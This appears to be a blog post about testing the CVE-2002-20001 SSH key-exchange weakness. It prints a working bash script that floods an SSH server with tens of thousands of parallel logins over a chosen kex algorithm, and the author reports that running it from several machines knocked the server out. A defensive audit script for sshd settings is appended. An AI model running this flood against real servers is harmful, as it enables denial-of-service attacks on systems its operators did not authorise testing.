ssh Vulnerability DoS test

By | May 30, 2023

I created this test while working with the CVE-2002-20001 vulnerability. The vulnerability concerns the diffie-hellman-group-exchange-sha256 key exchange algorithm, which has high computational complexity: it uses long exponents that arguably make certain calculations unnecessarily expensive. To test the issue I created a small bash script to simulate a DDoS attack on an ssh server using different key exchange algorithms. The script code is:

#!/bin/bash
# Arguments: $1 = server, $2 = key exchange algorithm to request
if [ $# -ne 2 ]; then
        echo "No arguments: server ID/FQDN and kex algorithm"
        exit 1
fi
for i in {0..70000}
do
        sshpass -p 12345 ssh -o KexAlgorithms="$2" admin@"$1" &
done

To run the script you need to install sshpass; on CentOS:

yum install sshpass

Then I started with the diffie-hellman-group-exchange-sha256 key exchange algorithm:

./ diffie-hellman-group-exchange-sha256

An attempt to log in via ssh to the same server showed me this:

# ssh root@
ssh_exchange_identification: Connection closed by remote host

However, attempts with other Kex algorithms did not show significant differences; sometimes login was denied as well. However, when I ran the script from different computers, in other words doing a DDoS attack instead of a DoS, the ssh server on the target machine always fell into an unusable state.
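A server-side check to go with the test above, added here as an example and not part of the original post: it lists every diffie-hellman-* key exchange name an sshd configuration still offers (a wider set than the one algorithm tested above) and shows its MaxStartups setting. It assumes input in the "keyword value" form printed by `sshd -T`; the sample configuration and the function names are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit sshd settings relevant to CVE-2002-20001.
# Input format: "keyword value" lines as printed by `sshd -T` (run as root).

# Print each finite-field DH kex algorithm enabled in the config on stdin.
dhe_kex_enabled() {
    awk '$1 == "kexalgorithms" {
            n = split($2, algs, ",")
            for (i = 1; i <= n; i++)
                if (algs[i] ~ /^diffie-hellman-/) print algs[i]
         }'
}

# Print the maxstartups value (start:rate:full), or "unset" if absent.
max_startups() {
    awk '$1 == "maxstartups" { v = $2 }
         END { print (v == "" ? "unset" : v) }'
}

# Constructed sample of effective sshd settings (not from a real server).
SAMPLE_CONFIG='port 22
kexalgorithms curve25519-sha256,ecdh-sha2-nistp256,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256
maxstartups 10:30:100'

# Report both findings for a config passed as one string argument.
audit() {
    dhe=$(printf '%s\n' "$1" | dhe_kex_enabled)
    if [ -n "$dhe" ]; then
        echo "DHE kex still offered:"
        printf '%s\n' "$dhe" | sed 's/^/  /'
    else
        echo "no DHE kex offered"
    fi
    echo "maxstartups: $(printf '%s\n' "$1" | max_startups)"
}

audit "$SAMPLE_CONFIG"
# On a real server: audit "$(sshd -T)"
```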
